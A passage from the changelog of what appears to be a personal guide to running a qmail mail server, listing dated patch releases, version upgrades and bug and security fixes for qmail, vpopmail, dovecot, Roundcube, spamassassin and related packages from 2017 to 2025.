    - conf-cc and conf-ld now have -L/usr/pkg/lib and -I/usr/pkg/include to satisfy netBSD
    - vpopmail-dir.sh: minor correction to vpopmail dir existence check
    - srs.c: #include <srs2.h> now without path
  • Feb 9, 2025
    - some packages updated to compile on FreeBSD/clang: daemontools, vpopmail, autorespond, qmailadmin
    - roundcube updated to v. 1.6.10
  • Jan 30, 2025
    - dovecot and dovecot-pigeonhole updated to v. 2.4.0
  • Dec 31, 2024
    the default driver for the Roundcube password plugin is now sql, as vpopmaild doesn't work when SHA-512 passwords have been enabled on vpopmail (--disable-sha512-passwords). All SQL queries have been updated.
  • Dec 20, 2024
    vpopmail upgraded to v. 5.6.4
    - Password strength enforcement PR #5 (grabbed from Matt Brookings' 5.5.0-dev version)
    - Dropped min pwd length feature.
    - vmysql.h: tables' layout changed in order to have VARCHAR instead of CHAR. Fields containing ip addresses enlarged to VARCHAR(39), to create room for ipv6. Unix timestamps definition changed from BIGINT(20) to INT(11). (commit 44bad58) Have a look to the upgrade notes below.
  • Dec 06, 2024
    - vqadmin v. 2.4.3: added a patch to highlight users with restrictions and with admin privileges (thanks Bai Borko)
  • Dec 01, 2024 (More info here)
    qmail v2024.12.01
    - Added support for EAI (RFC 5336 SMTP Email Address Internationalization) (#13). Thanks to https://github.com/arnt/qmail-smtputf8/tree/smtputf8-tls.
    - chkuser is now smtputf8 compliant. It accepts utf8 characters in sender and recipient addresses provided that the remote server advertises the SMTPUTF8 verb in MAIL FROM, otherwise it allows only ASCII characters plus additional chars from the CHKUSER_ALLOWED_CHARS set. (#15 #16)
    * dropped variables CHKUSER_ALLOW_SENDER_CHAR_xx CHKUSER_ALLOW_RCPT_CHAR_xx (replaced by CHKUSER_ALLOWED_CHARS)
    * dropped variables CHKUSER_ALLOW_SENDER_SRS and CHKUSER_ALLOW_RCPT_SRS, as we are always accepting '+' and '#' characters
    * added variables CHKUSER_INVALID_UTF8_CHARS and CHKUSER_ALLOWED_CHARS
  • Nov 15, 2024
    - dovecot: added a postlogin script to update the vpopmail.lastauth SQL table on login (see 10-master.conf, thanks kengheng)
  • Oct 26, 2024
    - qmail upgraded to v. 2024.10.26
    * qmail-remote.c patched to dinamically touch control/notlshosts/<fqdn> if control/notlshosts_auto contains any number greater than 0 in order to skip the TLS connection for remote servers with an obsolete TLS version. (tx Alexandre Fonceca) (commit)
    * defined CHKUSER_DISABLE_VARIABLE "RELAYCLIENT" in chkuser_settings.h
    * enabled CHKUSER_SENDER_NOCHECK_VARIABLE "RELAYCLIENT" in chkuser_settings.h
    * fixed several compilation breaks/warnings on later gcc compilers (tx Pablo Murillo)
    * invalid auth fix in qmail-smtpd.c's smtp_auth function (tx Alexandre Fonceca for the advice) (commit)
    * qmail path determined dinamically in conf-policy
    * added a patch to remove chkuser and the vpopmail dependency (patches dir)
  • Oct 19, 2024 
    vpopmail v.5.6.3
    - bug fixed: passwords with length > 8 were denied if sha-512 was disabled
    - fixed a configure break where a trivial C test program exits on error with gcc-14.1 due to missing headers
    - vusaged/domain.c: fixed -Wimplicit-function-declaration compilation warning
    - vmysql.h: dropped the multicolumn PRIMARY KEY in valias table to allow multiple forwards for a given alias.
  • Oct 9, 2024
    - daemontools-0.78.2: added -ltr to conf-ld to restore compatibility with systems with glibc prior to v. 2.17 like RHEL6/CentOS6, where the librt.so library is not linked
  • Sep 22, 2024
    -fehqlibs updated to v. 25c
    -ucspi-tcp6 updated to v. 1.13.01
    -ucspi-ssl updated to v. 0.13.02
  • Sep 7, 2024
    - daemontools-0.78: fixed a .gitignore issue which was preventing the package/compile script upload (thanks Ivelin Topalov)
    - RC updated to v. 1.6.9
    - clamav updated to v. 1.4.1
    - qmailadmin upgraded to v. 1.2.23 (tx Nathanaël Semhoun)
    * Added support for qmail-autoresponder
    * Fixed load lang not retrieved
  • Aug 16, 2024
    - upgraded dovecot to v. 2.3.21.1
    - upgraded pigeonhole to v. 0.5.21.1
  • Jul 31, 2024
    multilog uses "d" flag as default to gain compatibility with the readable datetime format of multilog in daemontools-0.78. Change it with the "t" flag if you prefer to have timestamps.
  • Jul 29, 2024 (version 0.78)
    - multilog prints a readable datetime if used with "d" flag, it prints timestamps if used in the usual way with the "t" flag (80f2133)
    - fixed several compilation warnings and/or breaks on gcc-14.1
  • Jul 26, 2024
    vqadmin (version 2.4.1): Fixed configure break. Trivial C test program breaks on gcc-14.1 due to missing headers (commit)
  • July 17, 2024
    qmailadmin updated to v.1.2.22
    * owner no longer required in autorespond
    * template.c code optimization
  • July 15, 2024
    simscan 1.4.4 released: attachment size limit to be passed to spamassassin now handled by the size_limit variable in control/simcontrol, instead of the control/simsizelimit file.
  • Jun 8, 2024
    qmail patch upgraded to v. 2024.06.08:
    * conf-channels: default number of channels increased to 4 (was 2). Now qmail offers 2 additional channels with respect to the 2 offered by default (local and remote). More info here
    * maxrcpt: error code changed to 452 due to RFC 4.5.3.1 (was 553). If DISABLE_MAXRCPT is defined it skips the check, otherwise outgoing messages from mailing lists would be rejected. (commit)
  • Jun 7, 2024
    - vusaged: the header files of libev are now installed in /usr/local/include/libev (was /usr/local/include) to avoid conflicts with libevent (they both have an event.h header file). vusaged configure command was adjusted accordingly.
  • Jun 1, 2024
    - clamav upgraded to v. 1.3.1
  • May 26, 2024
    - Added Mailman installation howto
    - qmail patch upgraded to v. 2024.05.16 (changelog)
    - Roundcube upgraded to 1.6.7 (security fix)
    - Spamassassin upgraded to v. 4.0.1
    - Spamassassin: Razor-agents upgraded to v. 2.86 (fork of the original (dead?) project)
  • Mar 27, 2024
    qmailadmin updated to v. 1.2.21
  • Mar 4, 2024
    - Solr updated to v. 9.5.0
    - the documentation has been revised a bit
  • Feb 12, 2024 qmail update
    - DKIM patch upgraded to v. 1.48
    * fixed minor bug using filterargs for local deliveries (commit)
    - Fixed several compilation warnings (commit)
    - Fixed incompatible redeclaration of library function 'log2' in qmail-send.c qsutil.c as showed by notqmail friends here
    - removed FILES, shar target from Makefile
  • Feb 11, 2024
    clamav updated to v. 1.3.0
  • Feb 6, 2024
    qmail: DKIM patch upgraded to v. 1.47
    * fixed a bug which was preventing filterargs' wildcards to work properly on sender domain
  • Jan 27, 2024
    simscan upgraded to v 1.4.3: fixed several compilation and autotools warnings
  • Jan 21, 2024
    - qmail: liberal-lf: bare LF are no longer allowed by default due to smuggling vulnerability CVE-2023-51765. Bare LF can be allowed by defining ALLOW_BARELF in tcprules or in run file.
    - tcprules moved to /var/qmail/control
  • Jan 15, 2024
    qmail update:
    - TLS patch by F. Vermeulen upgraded to version 20231230 (more info at https://inoa.net/qmail-tls/ tx Greg Bell for the patch)
    * support to openssl 3.0.11
  • Jan 11, 2024
    - qmail: dkim patch upgraded to version 1.46
  • Jan 4, 2024
    qmail patch: DKIM patch upgraded to v. 1.44
    - fixed an issue with filterargs where spawn-filter is trying to execute remote:env xxxxx.... dk-filter. This issue happens when FILTERARGS environment variable is not defined in the qmail-send rc script.
    - dkim.c fix: https://notes.sagredo.eu/en/qmail-notes-185/configuring-dkim-for-qmail-92.html#comment3668 
    - dkfilter fix: correctly selects the domain to sign in case of sieve bounces
    - adjustments fo dk-filter and dknewkey man pages
  • Dec 30, 2023
    - spamassassin/DMARC filter: now DMARC_REJECT is not hit if SPF_HELO_PASS is true
  • Dec 26, 2023
    - qmailadmin upgraded to v1.2.18
    - Pyzor installed from github, as version 1.0.0 is not python3 compliant (thanks Mike)
  • Dec 11, 2023
    qmail, vpopmail, daemontools, qmailadmin, simscan and vqadmin source code moved to github
  • Nov 20, 2023
    -qmail patch updated. dkim:
    * The patch now by default excludes X-Arc-Authentication-Results
    * dkim can additionally use the environment variable EXCLUDE_DKIMSIGN to include colon separated list of headers to be excluded from signing (just like qmail-dkim). If -X option is used with dk-filter, it overrides the value of EXCLUDE_DKIMSIGN.
  • Nov 5., 2023
    -bug fix: vpopmail defaultdelivery patch: it won't create the .qmail file in case control/defaultdelivery already has vdelivermail, in order to prevent a vpopmail loop
    -qmailforward RC plugin: it won't create the copy record if $config['qmailforward_defaultdelivery'] contains 'vdelivermail'
  • Oct 13, 2023
    - vpopmail: added "s/qmail cdb" patch, which gets vpopmail to locate correctly the qmail assign.cdb for s/qmail users. s/qmail users should configure vpopmail with --enable-sqmail-cdb
  • Oct 6, 2023
    - clamav updated to v. 1.2.0
  • Sep 26, 2023
    new qmail combined patch:
    -surblfilter logs the rejected URL in the qmail-smtpd log. It can now inspect both http and https URLs.
    -Improvements in man dkim.9, qmail-dkim.9 and surblfilter.9
  • Sep 17, 2023
    - dovecot upgraded to v 2.3.21
    - pigeonhole upgraded to v 0.5.21
  • Sep 14, 2023
    - simscan now defines the maximum size of messages to be passed to spamassassin via control/simsizelimit file
  • Sep 5, 2023
    -new qmail patch and DKIM patch upgraded to v. 1.42
    *dk-filter.sh: "source $envfn" has been replaced with ". $envfn" in oder to work for pure bourne shells
    *minor corrections to the man pages
    -vpopmail: changed configuration option --enable-logging=e (was p). Now failed attempts will be logged with no password shown.
  • Sep 3, 2023
    -daemontools: Buffer Overflow fixed in timestamp.c (patch multilog-readable_datetime, Ubuntu 22.04). It was causing empty log files everywhere. (thanks Bai Borko and KPC)
  • Aug 27, 2023
    - nuova patch per vpopmail e nuovo plugin qmailforward per Roundcube che vanno a risolvere diverse problematiche. Maggiori informazioni nella pagina dedicata..
  • Aug 20, 2023 (diff)
    -qmail combined patch: install a sample control/smtpplugins file in case it does not exist yet, to avoid "unable to read control" crash.
  • Aug 17, 2023
    - helodnscheck:
    * C++ version (testing).
    * bug fix: segfault in case of no result in DNS record.
    * default action changed to GNLR
  • 5 agosto 2023
    L'installzione del certificato Let's Encrypt è ora basata su dehydrated. La vecchia documentazione basata su certbot non verrà più aggiornata.
  • Jul 18, 2023
    vqadmin: patch updated
    - Italian translation file html/it updated, following the patch by Ali Erturk TURKER
    - the vqadmin source directory has been cleaned of unnececessary files
  • Jul 15, 2023
    - fail2ban: l'installazione e la configurazione è stata rivista per funzionare su Debian, dove python2 non è presente (grazie a Gabriel Torres)
  • Jun 30, 2023
    -daemontools: added my multilog-readable_datetime patch which replace the timestamp in the log lines with a human readable datetime. Do not install it if you prefer to stick with the timestamp.
    -if you install this patch you have to download again the convert-multilog program. In case you decide to stick with the original timestamp, then use the original convert-multilog. (diff)
    -qmail combiend patch: DKIM patch upgraded to v. 1.41
    *dknewkey will allow domains in control/domainkey
    *Made a few adjustments to the man pages and dkimsign.cpp for DKIMDOMAIN to work with qmail-smtpd (in case some configures qmail-smtpd to sign instead of the usual dk-filter/qmail-remote)
    -The broken link based on pobox.com in the default SPF error explanation was changed to https://mxtoolbox.com/SuperTool.aspx?action=spf
  • Jun 25, 2023
    - Spamassassin: The ExtractText notes have been revised and corrected by Gabriel Torres
  • Jun 18, 2023
    * qmail combined patch (diff)
    -vpopmail uid and gid are determined dinamically instead of assigning 89:89 ids by default
    -vpopmail install directory determined dinamically (was /home/vpopmail). Now the variable in the conf-cc file is determined as well.
    Feel free to post any issue in the comments as I'm not sure that /bin/sh will work in all Linux.
    * qmail run scripts:
    -defined the variable QMAILDIR in all run scripts in order to manage installations of qmail in directories different from default /var/qmail
    -/home/vpopmail is now ~vpopmail in order to manage installations of vpopmail in directories different from default /home/vpopmail
    -defined the variable TCPRULES_DIR on top of all run scripts
  • May 18, 2023
    -certbot/letsencrypt: added the option --key-type rsa to the certbot command, to avoid that certbot will silently default to ECDSA the private key format, which results not understandable by my openssl-1.1. In this way the format of the private key will be RSA. More info here.
  • May 17, 2023
    -SURBL: Top level domains URL is changed. So we have to adjust the update_tlds.sh script accordingly
  • Apr, 26, 2023
    -new combined patch and dkim patch updated to v. 1.40
    -qmail-dkim uses CUSTOM_ERR_FD as file descriptor for errors (more info here)
  • Apr 25, 2023
    - qmailadmin cracklib patch: bug fix in qmailadmin/passwd: it was changing the password also in case of cracklib alert (tx Alexandre Fonseca)
    - new qmailadmin combined patch released
  • Mar 27, 2023
    qmail combined patch (diff here)
    -chkuser.c: double hyphens "--" are now allowed also in the rcpt email (tx Ali Erturk TURKER)
    -chkuser_settings.h CHKUSER_SENDER_NOCHECK_VARIABLE commented out. Sender check is now enabled also for RELAYCLIENT
    -removed a couple of redundant log lines caused by qmail-smtpd-logging
  • Mar 18, 2023
    - new qmail combined patch
    * bugfix in dkimverify.cpp: now it checks if k= tag is missing (tx Raisa for providing detailed info)
    * redundant esmtp-size patch removed, as the SIZE check is already done by the qmail-authentication patch (tx Ali Erturk TURKERdiff here
  • Mar 14, 2023
    - qmail combined patch: the split_str function in dknewkey was modified in order to work on debian 11 (tx J)
  • Mar 12, 2023
    - qmail patch updated: the mail headers will change from "ESMTPA" to "ESMTPSA" when the user is authenticated via starttls/smtps (tx Ali Erturk TURKER)
    diff here
  • Mar 1, 2023
    - qmail combined patch updated: added qmail-fastremote patch (tx Ali Erturk TURKER for the advise). qmail-remote CRLF removed (replaced by fastremote)
  • Feb 27, 2023
    - qmail combined patch updated: now qmail-remote is rfc2821 compliant even for implicit TLS (SMTPS) connections (tx Ali Erturk TURKER)
  • Feb 24, 2023
    - qmail combined patch updated: several missing references to control/badmailto and control/badmailtonorelay files were corrected to control/badrcptto and control/badrcpttonorelay (tx Ali Erturk TURKER) diff here
  • Feb 20, 2023
    - qmail combined patch updated
    ---- dkim patch upgraded to v. 1.37
    ------ ed25519 support​ (RFC 8463)
    ------ old yahoo's domainkeys stuff removed (no longer need the libdomainkeys.a library)
  • Feb 18, 2023
    -vpopmail: added a patch by Ali Erturk TURKER which fixes several issues
    -vqadmin: added a patch by Ali Erturk TURKER which, among the other things, makes vqadmin aware of mysql-limits
  • Feb 10, 2023
    -dovecot: added a patch to restore the old vpopmail-auth driver (tx Ali Erturk TURKER)
  • Jan 31,2023
    -bug fix in qmail-smtpd.c. 4096 bit RSA key cannot be open (tx Ali Erturk TURKER)
  • Jan 4, 2023
    -Solr upgraded to version 9.1.0
    -The SOlr page has been improved as far as configuration, security and testing are concerned
  • Jan 1, 2023
    -ClamAV upgraded to version 1.0.0
    -new qmail combined patch released. Bug fix in dk-filter. It was calling a non existent function (tx Andreas).
  • Dic 17, 2022
    -qmail combined patch release
    * chkuser receipt check won't be disabled for RELAYCLIENT
    * CHKUSER_DISABLE_VARIABLE commented out from chkuser_settings.h
  • Nov 20, 2022
    -switched all actions to nftables, as it has now replaced iptables and fail2ban has support for it.
  • Nov 18, 2022
    -fail2ban upgraded to v. 1.0.2
  • Oct 28, 2022:
    added a note on how to avoid being cutoff by spamhaus (tx Marco Varanda)
  • 2022.10.02
    -dkim patch updated to v. 1.30 and new qmail combined patch released
    * bug fix: it was returning an error in case of domains with no key.
  • Sep 29, 2022
    -bug fixed in the domainkey script: it wasn't creating the symbolic link of the selector name to the private key in case of a custom selector defined in the file control/dkimkeys
    Sep 28, 2022
    -qmail combined patch updated with new dkim patch v. 1.29. More info here
    -Roundcube webmail updated to v. 1.6.0
  • Aug 12, 2022
    -dovecot: improved the sql stuff in case of --disable-many-domains (tx kengheng).
    -dovecot-pwd_query patch for vpopmail: added a procedure for the user_query (needed for dovecot/LDA)
    -dovecot-pwd_query patch for vpopmail renamed to dovecot-sql-procedures
    -combined patch for vpopmail updated
  • Aug 08, 2022
    -qmailctl script improved. Now the script exits if services are not started with svscanboot or a supervise script is missing
    -roundcube/password plugin: the cracklib patch has been improved. Now it can retrieve the correct cracklib-check path
  • Jul 28, 2022
    -The Roundcube plugins' page has been revised and polished. A couple of plugins have been added.
  • May 22, 2022
    qmail patch: "qmail-smtpd pid, qp log" patch (http://iain.cx/qmail/patches.html#smtpd_pidqp) removed, as its log informations are already contained in the qlogreceived line. (diff)
    -improved a couple of read_failed error messages
  • May 12, 2022
    -clamav: updated to v. 0.105
    -qmailctl: a few modifications to avoid error strings in the service uptime when service is stopped. qmail-smtpsd was added to svclist
    -qmail-smtpsd support added
  • Apr 22, 2022
    -dovecot: added Solr support
  • Apr 17, 2022
    -dovecot/auth-sql.conf.ext: changed the userdb lookup for LDA from static to sql, as the home dir was not retrieved correctly if positioned in a subfolder (i.e. domains/0/domainname).
  • Apr 9, 2022
    qmailadmin: --enable-imageurl=/files is now --enable-imageurl=/qmailadmin/files (no need to have an alias on apache config). Added --disable-catchall, which is bad for spam. Tx Gabriel Torres
  • Apr 01, 2022
    -qmailadmin: new combined patch. It now logs to stderr when qma-auth.log file can't be opened in write mode. It was returning a white screen
  • Mar 17, 2022
    -vpopmail: new combiend patch: fixed a compilation break in vmysql.c with Debian 11 / gcc-10
  • Feb 26, 2022
    -added REJECTNULLSENDERS environment variable (diff)
  • Feb 18, 2022
    -fail2ban: added a couple of new rules to the qmail-smtpd.conf filter
  • Feb 13, 2022
    -fixed a TLS Renegotiation DoS vulnerability. Disabled all renegotiation in TLSv1.2 and earlier. (diff here)
  • Feb 1, 2022
    -added a plugin to qmail to filter bad DNS HELOs (more info here)
    -Roundcube upgraded to v. 1.5.2
  • Jan 17, 2022
    -new qmail combined patch (diff here):
    * now qmail-smtpd logs rejects when client tries to auth when auth is not allowed, or it's not allowed without TLS (a closed connection with no log at all appeared before).
    * added qmail-spp.o to the TARGET file so that it will be purged with "make clean".
  • Dec 19, 2021
    -new qmail combined patch: added qmail-spp patch
  • Oct 21, 2021
    roundcube updated to v. 1.5.0
  • Sep 28, 2021
    clamav updated to v. 0.104. The new version installation is based on cmake (autotools abandoned)
  • Sep 27, 2021
    -new qmail combined patch: now chkuser allows double hyphens "--" in the sender email, like in y--s.co.jp (diff here)
  • Sep 8, 2021
    fail2ban updated to v. 0.11.2 and rc.fail2ban moved to /usr/local/bin/fail2banctl. The dovecot filter has been improved
  • Sep 2, 2021
    -an issue in vusaged configure arised. I cured it with a patch, while Luca in the comments found a different solution.
  • Aug 22, 2021
    -minor fix to qmail patch/qlog: now it logs the auth-type correctly (diff)
  • Aug 15, 2021
    at the bottom of the qmail/testing page I added a note to the testssl script by Dirk Wetter, which allows you to inspect your SSL connection in detail.
  • July 28, 2021
    simscan: my attachments-size-limit patch added. It allows you to overcome a limitation where simscan doesn't pass messages over 250k to spamassassin.
  • July 16, 2021
    spamassassin: bayes_token.token database field changed to binary(5). It was char(5).
  • Jul 12, 2021
    -spamassassin/userprefe: the "preference" varchar length in the database "userprefs" table was increased to 50 (was 30) to create space for long label such as  "bayes_auto_learn_threshold_spam", which resulted truncated before the modification.
  • June 20, 2021
    -spamassassin: created a script to process the spam/ham for the learning and reporting system (more info here)
    -dovecot 15-mailboxes.conf: added mailboxes for the learning and reporting system
  • June 19, 2021
    new qmail combined patch released
    -chkuser: defined extra allowed characters in sender/rcpt addresses and added the slash to the list (tx Thomas).
    -RSA key and DH parameters are created 4096 bit long also in Makefile-cert. qmail-smtpd.c and qmail-remote.c updated accordingly (tx Eric Broch).
    -Makefile-cert: the certs will be owned by vpopmail:vchkpw
  • March 27, 2021
    - bug fixes in the vpopmail/defaultdelivery patch: increased the buffer for the .qmail-default file path, as in particular cases of long path/domain names it will result truncated. Fixed another bug where the .qmail.default file where opened twice.
    - now if vdelivermail is installed the "delete" option will be used instead of "bounce-no-mailbox", which is not reasonable anymore
  • March 21, 2021
    qmail combined patch updated. update_tmprsadh.sh: RSA key and DH parameters increased to 4096 bits
  • March 9, 2021
    vpopmail: the patch now installs the sql code needed for "one table per domain" (--disable-many-domains) in ~/vpopmail/etc/pwd-query_disable-many-domains.sql and creates the sql procedure if needed. Of course this add-on to vpopmail will be completely transparent when you compile with the default option --enable-many-domains
  • Feb 26, 2021
    vpopmail: added a defaultdelivery patch, which makes vpopmail to copy your preferred delivery agent (stored in QMAILDIR/control/defauldelivery) into the .qmail-default file of any newly created domains, overriding the default vpopmail's behaiviour, where vpopmail copies its delivery agent vdelivermail.
    Feb 5, 2021
    - vpopmail: the patch has been improved. The sql-aliasdomains stuff is now done by means of the vpopmail's C programs and functions.
    Feb 3, 2021
    - vpopmail: new patch and script released.
    Just configure --enable-sql-aliasdomains (default) and forget. The dbtable will be created the first time you will create an aliasdomain.
  • Jan 29, 2021
    - dovecot/auth-sql.conf.ext now uses the userdb's prefetch driver in order to perform one single query when doing the auth
    - dovecot/dovecot-sql.conf.ext has been modified to allow authentication both with real and alias domains, provided that you patched vpopmail accordingly. More info in this page.
    - vpopmail: sql-aliasdomains and combined patch released (new aliasdomains dbtable has to be created!)
  • Jan 13, 2021
    - vpopmail/dovecot: added support for sql aliasdomains
  • Gen 5, 2021
    - dovecot upgraded to v. 2.3.13 (vpopmail-auth removed by dovecot's developers)
    - pigeonhole upgraded to v. 0.5.13
  • Gen 3, 2021
    - Roundcube: Upgraded to v. 1.4.10
    - Roundcube: disabled the SMTP authentication when sending messages via RC. SMTP port changed to 25.
  • Gen 2, 2021
    - ucspi-tcp6: upgraded to latest version
    - fehQlibs have to be installed as a prerequisite of ucspi-tcp6
  • Dec 4, 2020
    - combined patch for qmail updated to solve compatibility problems with new gcc-10
    - a patch was also released to get vpopmail compiled with gcc-10
    - Tony Fung suggested a script to expunge messages, which can be very useful in case you need to expunge differently depending on your mailboxes/domains.
  • Nov 18, 2020
    spamassassin:
    - solved some priviledge problems with the reports of the RC's markasjunk plugin, which is going to write inside the log dir and read the razor's identity file.
    - moved all log files into /var/log/spamassassin (apache group now has +w priv). spamdctl and logrotate scripts modified accordingly
  • 2020.10.30
    Clamav: added clamav-unofficial-sigs (tx Tony Fung for the suggestion). Updated clamdctl and freshclamctl scripts to allow the restart function, needed by clamav-unofficial-sigs script
  • 2020.10.28
    modified the spamassassin's DMARC rule. Now it passes emails with one between DKIM and SPF valid, according to RFC7489 (thanks Marcel Veldhuizen and Iulian for the hints)
  • 2020.10.08
    rcptcheck-overlimit.sh: bug fix (tx Tony Fung)
  • 2020.09.02
    spamassassin/DMARC: corrected the askDNS rule as it was not triggering the reject in the event that only one of DKIM or SPF failed (tx A F)
  • 2020.09.01
    qmailadmin: minor adjustments to the skin patch
  • 2020.08.12
    dovecot: upgraded to v. 2.3.11.3
    dovecot-pigeonhole: upgraded to v. 0.5.11
  • 2020.08.11
    Roundcube: upgrade to v. 1.4.8
  • 2020.08.10
    - new qmailadmin skin/combined patch released:
    mod_user.html: added the "value" attribute to the name/gecos input tag (tx Pablo Murillo)
  • 2020.08.04
    - simscan: upgraded to v. 1.4.1
  • 2020.08.02
    - several clarifications in the simscan page;
    - revised the ripMIME installation as the dev version of the program is now downloaded from github, to solve complation breaks.
  • 2020.07.29
    - new combined patch
    * dk-filter: corrected a bug where dk-filter was using DKIMDOMAIN unconditionally. Now it uses DKIMDOMAIN only if _SENDER is null (tx Manvendra Bhangui).
  • 2020.07.27
    - new combined patch
    * added a fix for cve-2005-1513 (tx C for the hint)
  • 2020.07.15 
    - spamassassin: added Razor2, Pyzor, Spamcop configuration
    - Roundcube/markasjunk plugin has now info about the cmd_learn and the multi_driver drivers
    (tx Gabriel Torres)
  • 2020.07.03
    Roundcube/password plugin: added a patch to make it work in combination with cracklib, to enforce password strenght (tx Tony Fung)
  • 2020.06.10
    Roundcube: upgrade to v. 1.4.5 
  • 2020.05.22
    new qmailadmin skin/combined patch released
  • 2020.05.05
    -qmailadmin
    * patched qmailadmin to provide a new responsive skin for the control panel.
    * combined patch released
  • 2020.05.01
    -qmailadmin
    * added qmailadmin-cracklib patch to enforce password complexity
    * pwd-strenght patch removed
  • 2020.04.25
    -combined patch updated
    * qmail-smtpd.c: added rcptcount = 0; in smtp_rset function to prevent the maxrcpto error if control/maxrcpt limit has been exceeded in multiple messages sent sequentially rather than in a single mail (tx Alexandre Fonceca)
  • 2020.04.16
    - new combined patch: qmail-remote-logging patch added (more info here)
  • 2020.04.10
    - new combined patch: DKIM patch updated to v. 1.28
    * outgoing messages from null sender ("<>") will be signed as well with the domain in env variable DKIMDOMAIN
    * declaring NODK env variable disables old domainkeys signature, while defining NODKIM disables DKIM.
  • 2020.03.31
    - DKIM configuration: added UNSIGNED_SUBJECT variable to the run files, which can be useful to declare if one wants to allow messages without the sign of the subject (more info here)
    2020.03.19
    dovecot: added the autoexpunge setting in 15-mailbox.conf. The expunge via cronjob in not needed anymore
  • 2020.02.26
    vqAdmin: fixed a problem which was preventing the patch to be applied (tx Marco Varanda)
  • 2020.02.25
    dovecot: modified 10-master.conf to set up stats' service priviledges and correct an error which appeared in qmail-send
  • 2020.02.11
    table spamassassin.txrep modified as the column "count" was renamed (tx Tony Fung).
  • 2020.02.06
    queue-repair.py: applied a patch to make the program python3 compliant (tx Tony Fung)
  • 2020.02.04
    dovecot-sql.conf.ext: adjusted the user_query string to get compatibility with mariadb-10.3 (tx Tony Fung)
  • 2020.01.11
    - new combined patch: qmail-tls patch updated to v. 20200107
    * working client cert authentication with TLSv1.3
  • 2019.12.12
    spamassassin: upgraded to v. 3.4.3
  • 2019.12.08
    - big patch updated
    * qmail-smtpd.c: now TLS is defined before chkuser.h call, to avoid errors on closing the db connection (tx ChangHo.Na) 
    - domainkeys script improved: it now manages 2048 bit long key (tx Tatsuya Yokota)
  • 2019.12.01
    dovecot: upgraded to v. 2.3.8
    dovecot-pigeonhole: upgraded to v. 0.5.8
    Roundcube: upgraded to v. 1.4.1 (mobile responsive skin released!)
    Roundcube plugins: updated
  • 2019.09.18
    spamassassin: added a page concerning TxRep and another one concerning DMARC filter
  • 2019.09.09
    dovecot: now the SQL user_query retrieves the quota as well (tx Alexandre Fonceca, more info here)
  • 2019.08.07
    - a couple of adjustments to chkuser (tx Luca Franceschini, more info here)
    * BUG - since any other definition of starting_string ends up as "DOMAIN", if starting_string is otherwise defined, chkuser will be turned off.
    * CHKUSER_ENABLE_ALIAS_DEFAULT, CHKUSER_VAUTH_OPEN_CALL and CHKUSER_DISABLE_VARIABLE are now defined in chkuser_settings.h
    * Now CHKUSER_DISABLE_VARIABLE, CHKUSER_SENDER_NOCHECK_VARIABLE, CHKUSER_SENDER_FORMAT_NOCHECK, CHKUSER_RCPT_FORMAT_NOCHECK and CHKUSER_RCPT_MX_NOCHECK can be defined at runtime level as well.
  • 2019.07.12
    - qmail-channels patch added
    more info here http://www.thesmbexchange.com/eng/qmail-channels_patch.html 
    - improved verbosity of die_read function in qmail-smtpd.c (qmail-smtpd: read failure). More info here.
  • 2019.06.19
    - DKIM patch updated to v. 1.26
    * BUG - honor body length tag in verification
  • 2019.05.24
    - qmail-tls patch updated to v. 20190517
    * bug: qmail-smtpd ssl_free before tls_out error string (K. Wheeler)
  • 2019.05.23
    - DKIM patch updated to v. 1.25
    * SIGSEGV - when the txt data for domainkeys is very large exposed a bug in the way realloc() was used incorrectly.
    * On 32 bit systems, variable defined as time_t overflows. Now qmail-dkim will skip expiry check in such conditions.
  • 2019.04.25
    * bug fixed on qmail-smtpd.c: it was selecting the wrong openssl version on line 2331 (tx ChangHo.Na)
    2019.04.09
    - qmail-tls patch updated to v. 20190408
    * make compatible with openssl 1.1.0 (Rolf Eike Beer, Dirk Engling, Alexander Hof)
    * compiler warnings on char * casts (Kai Peter)
  • 2019.04.03
    - libdomainkeys patch updated (tx Manvendra Banghui)
  • 2019.03.22
    - new combined patch: fixed a bug causing crashes of qmail-remote when using openssl-1.1 (tx Luca Franceschini)
  • 2019.02.27
    - port to openssl-1.1
    - DKIM patch updated to v. 1.24
    * bug fix: restored signaturedomains/nosignaturedomains functionalities.
  • 2019.02.26
    simscan: patch updated (tx Pablo Murillo)
    vQadmin: some adjustments into apache config and it's working again under apache-2.4 (tx Erald)
  • 2019.02.01
    fail2ban upgraded to v. 0.10.4
  • 2018.09.23
    spamassassin upgraded to v. 3.4.2
  • 2018.08.25
    -DKIM patch updated to v. 1.23
    * fixed a bug where including round brackets in the From: field ouside the double quotes (From: "Name Surname (My Company)" <name.surname@company.com>) results in a DKIMContext structure invalid error (tx Mirko Buffoni).
    * qmail-dkim and dkim were issuing a failure for emails which had multiple signature with at least one good signature. Now qmail-dkim and dkim will issue a success if at least one good signature is found.
  • 2018.08.23
    -logging patch updated to v. 5
    * fixed a bugin logit and logit2 functions where a RSET command and a subsequent brutal quit of the smtp conversation ^] by the client cause a segfault (tx Mirko Buffoni, more info here)
  • 2018.08.02
    ezmlm-web: Ricardo Brisighelli sent me two patches which solves compilation breaks with gcc-7
  • 2018.06.22
    -clamav updated to v. 0.100.0
  • 2018.04.06
    -added a patch to daemontools to extend the log file size limit to 100MB (tx Sam Tang)
  • 2018.04.04
    -qmailctl script updated (tx Sam Tang)
    * "qmailctl stat" now shows something like "0 days, 00 hours 16 mins"
    * can assign another service which related qmail for monitoring, like dovecot, clamd, freshclam...
    * change "up" and "down" to green and red color.
  • 2018.04.03
    -DKIM patch updated to v. 1.22
    * openssl 1.1.0 port
    * various improvements, bug fixes
  • 2018-03-21
    added a new page to explain how to install a letsencrypt certificate for qmail and dovecot here
  • 2018-02-07
    clamav updated to v. 0.99.3 (bug fix, tx to Bob Greco
  • 2018-01-10
    == combined patch updated
    -maildir++
    * fixed a bug where the filesize part of the S=<filesize> component of the Maildir++ compatible filename is wrong (tx MG). More info here and here.
    -qmail-queue-extra
    * removed, because it was causing more problems than advantages, as the domain of the log@yourdomain.tld had to match the system domain inside control/me and can't be a virtual domain as well.
    == dovecot: upgraded to v. 2.3.0
    == dovecot-pigeonhole: upgraded to v. 0.5.0.1 
  • 2017-10-24
    new patch arrived (tx Luca Franceschini)
    -qlogfix (diff here)
    * log strings should terminate with \n to avoid trailing ^M using splogger
    * bug reporting custom errors from qmail-queue in qlog
    -added dnscname patch
    -added rcptcheck patch
    added rcptcheck-overlimit.sh (tx Luca Franceschini)
    added a page about rcptcheck-overlimit.sh usage
  • 2017-09-05
    Roundcube upgraded to v. 1.3.1. The enigma plugin requires Crypt_GPG-1.6.2
  • 2017-08-24
